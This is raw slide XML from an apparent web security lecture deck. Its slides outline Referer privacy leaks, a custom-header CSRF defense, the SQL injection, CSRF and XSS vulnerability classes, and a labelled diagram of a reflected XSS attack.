            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="1752600"/>
            <a:ext cx="554037" cy="655637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ECD882"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5500">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5500">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89093" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="2179637"/>
            <a:ext cx="482600" cy="655638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5500">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89094" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7793037" y="2705100"/>
            <a:ext cx="439738" cy="769937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
              <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>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Referer Privacy Problems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90115" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Referer may leak privacy-sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://intranet.corp.apple.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		projects/iphone/competitors.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Common sources of blocking:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Network stripping by the organization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Network stripping by local machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Stripped by browser for HTTPS -&gt; HTTP transitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>User preference in browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Buggy user agents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Site cannot afford to block these users</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ko-KR" smtClean="0">
                <a:ea typeface="굴림" pitchFamily="-65" charset="-127"/>
              </a:rPr>
              <a:t>Custom Header Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94211" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>XMLHttpRequest is for same-origin requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Can use setRequestHeader within origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Limitations on data export format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>No setRequestHeader equivalent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>XHR2 has a whitelist for cross-site requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Issue POST requests via AJAX:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Doesn't work across domains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 13"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="5486400"/>
            <a:ext cx="4572000" cy="457200"/>
            <a:chOff x="2832" y="3051"/>
            <a:chExt cx="2216" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94213" name="Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="3051"/>
              <a:ext cx="2208" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94214" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="3052"/>
              <a:ext cx="2216" cy="212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>X-Requested-By: XMLHttpRequest</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cross Site Scripting  (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>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533400" y="1524000"/>
            <a:ext cx="114300" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Three top web site vulnerabilites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268"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SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser sends malicious input to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad input checking leads to malicious SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF – Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends request to good web site, using credentials of an innocent victim who “visits” site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS – Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends innocent victim a script that steals information from an honest web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2743200" y="2035175"/>
            <a:ext cx="3962400" cy="3320911"/>
            <a:chOff x="2743200" y="2035175"/>
            <a:chExt cx="3962400" cy="3320911"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2743200" y="4648200"/>
              <a:ext cx="3962400" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attacker’s malicious code executed on victim browser</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2743200" y="3330575"/>
              <a:ext cx="3962400" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attacker site forges request from victim browser to victim server</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2743200" y="2035175"/>
              <a:ext cx="3962400" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attacker’s malicious code executed on victim server</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRP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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Basic scenario: reflected XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12291" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2601913"/>
            <a:ext cx="1436688" cy="1436687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12292" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5959475" y="4979988"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12293" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5564188" y="1905000"/>
            <a:ext cx="2436812" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12294" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="15240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12295" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="4552950"/>
            <a:ext cx="17605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Victim Server </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12296" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1920875"/>
            <a:ext cx="3211512" cy="687388"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12297" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="15573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Victim client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12298" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2970213" y="1733550"/>
            <a:ext cx="1654175" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>visit web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12299" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2046288" y="2303463"/>
            <a:ext cx="3440112" cy="773112"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12300" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2589213" y="2270125"/>
            <a:ext cx="2576512" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>receive malicious link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12301"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12302" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049588" y="4070350"/>
            <a:ext cx="1654175" cy="400050"/>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12303" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319338" y="4521200"/>
            <a:ext cx="2638425" cy="400050"/>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12304" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="19494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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12305" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
